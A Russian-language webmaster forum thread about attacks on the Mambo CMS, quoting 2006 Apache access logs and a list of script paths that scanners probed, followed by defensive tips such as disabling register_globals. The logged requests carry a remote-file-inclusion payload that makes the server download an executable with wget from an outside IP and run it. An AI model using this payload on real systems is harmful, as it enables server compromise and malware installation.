Дырки в mambe

Код:

216.15.211.226 - - [22/Feb/2006:14:30:09 -0500] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.123.16.34/cmd.gif?&cmd=cd%20/tmp;wget%20209.123.16.34/gicumz;chmod%20744%20gicumz;./gicumz;echo%20YYY;echo|  HTTP/1.1" 404 298 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 216.15.211.226 - - [22/Feb/2006:14:30:10 -0500] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.123.16.34/cmd.gif?&cmd=cd%20/tmp;wget%20209.123.16.34/gicumz;chmod%20744%20gicumz;./gicumz;echo%20YYY;echo|  HTTP/1.1" 404 297 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 216.15.211.226 - - [22/Feb/2006:14:30:11 -0500] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.123.16.34/cmd.gif?&cmd=cd%20/tmp;wget%20209.123.16.34/gicumz;chmod%20744%20gicumz;./gicumz;echo%20YYY;echo|  HTTP/1.1" 404 304 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 216.15.211.226 - - [22/Feb/2006:14:30:12 -0500] "GET /cvs/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.123.16.34/cmd.gif?&cmd=cd%20/tmp;wget%20209.123.16.34/gicumz;chmod%20744%20gicumz;./gicumz;echo%20YYY;echo|  HTTP/1.1" 404 302 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 216.15.211.226 - - [22/Feb/2006:14:30:13 -0500] "GET /articles/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.123.16.34/cmd.gif?&cmd=cd%20/tmp;wget%20209.123.16.34/gicumz;chmod%20744%20gicumz;./gicumz;echo%20YYY;echo|  HTTP/1.1" 404 313 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" 216.15.211.226 - - [22/Feb/2006:14:30:14 -0500] "GET /cvs/mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://209.123.16.34/cmd.gif?&cmd=cd%20/tmp;wget%20209.123.16.34/gicumz;chmod%20744%20gicumz;./gicumz;echo%20YYY;echo|  HTTP/1.1" 404 308 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"

судя по всему есть дырка в мамбе, так что качайте обновления.

На днях кто-то пытался найти админку на одном из моих сайтов и запрашивал админки

Код:

/123bill/pb.php /ImageEmbed.php /admin/file_manager.php /adwordcompetitors/download.php /amember/plugins/payment/authorize_aim/authorize_aim.inc.php /autolinks/signin.php /awstats/awstats.pl /cal/tools/send_reminders.php /calendar/protection.php /calendar/tools/send_reminders.php /catalog/admin/file_manager.php /cgi-bin/accounts.cgi /cgi-bin/add-passwd.cgi /cgi-bin/af.cgi /cgi-bin/awstats.pl /cgi-bin/awstats/awstats.pl /cgi-bin/form.cgi /cgi-bin/friends/accounts.cgi /cgi-bin/htadmin.pl /cgi-bin/mailform.cgi /cgi-bin/mastergate/count.cgi /cgi-bin/openjournal.cgi /cgi-bin/top100/accounts.cgi /compare-mambo/index.php /compare-mambo/index2.php /cvs/index2.php /cvs/mambo/index2.php /editsite.php /email/emailpop.php /ezupload/index.php /forum/admin/admin_cash.php /gallhit.php /guestbook/kisgb/index.php /icon.php /include/common.php /includes/adodb/back/adodb-postgres7.inc.php /index2.php /install.php /iuser/common.php /keyworddirectory/download.php /links/includes/adodb/back/adodb-postgres7.inc.php /list.php /list/list.php /listpro/list.php /ln.php /mail/system/classes/class_richtext.php /mambo/index2.php /members/rebuild.php /members/registration.php /mpa2/config_permanent.php /phpmywebmin/home.php /printfriendly.php/index.php /protection.php /prw/index.php /routines/fieldValidation.php /sd3/constants.php /sitedepth/constants.php /system/classes/class_richtext.php /tools/send_reminders.php /top/config.php /ubbthreads/index.php /wm/gallhit.php /wordpress/xmlrpc.php /xcomicRootPath /xmlrpc.php

посему эти склонен считать что эти скрипты не надежны и их могут взломать в любой момент, так же как рекомендация не пользуйте нуленые скрипты, т.к. через них могут получить доступ не только в вашему сайту, но и всему серверу....

Eklmn: глянул я твои запросы. Против конкретно этого эксплойта есть вакцина, которая называется "register_globals=off". Против большинства остальных есть вакцина чтобы апач ходил под левым юзером.

самая пиздатая вакцина от сканеров на дырки,это настроить апач так,чтобы по ИП на сам домен зайти нельзя было.
сканерят по ИП всегда.

А это идея Пойду настрою

Eklmn писал:

сканерят по ИП всегда.

Не всегда. Не знаю как насчет мамбы, а вот vti и иже с ним - регулярно пытаются пробить именно по доменам.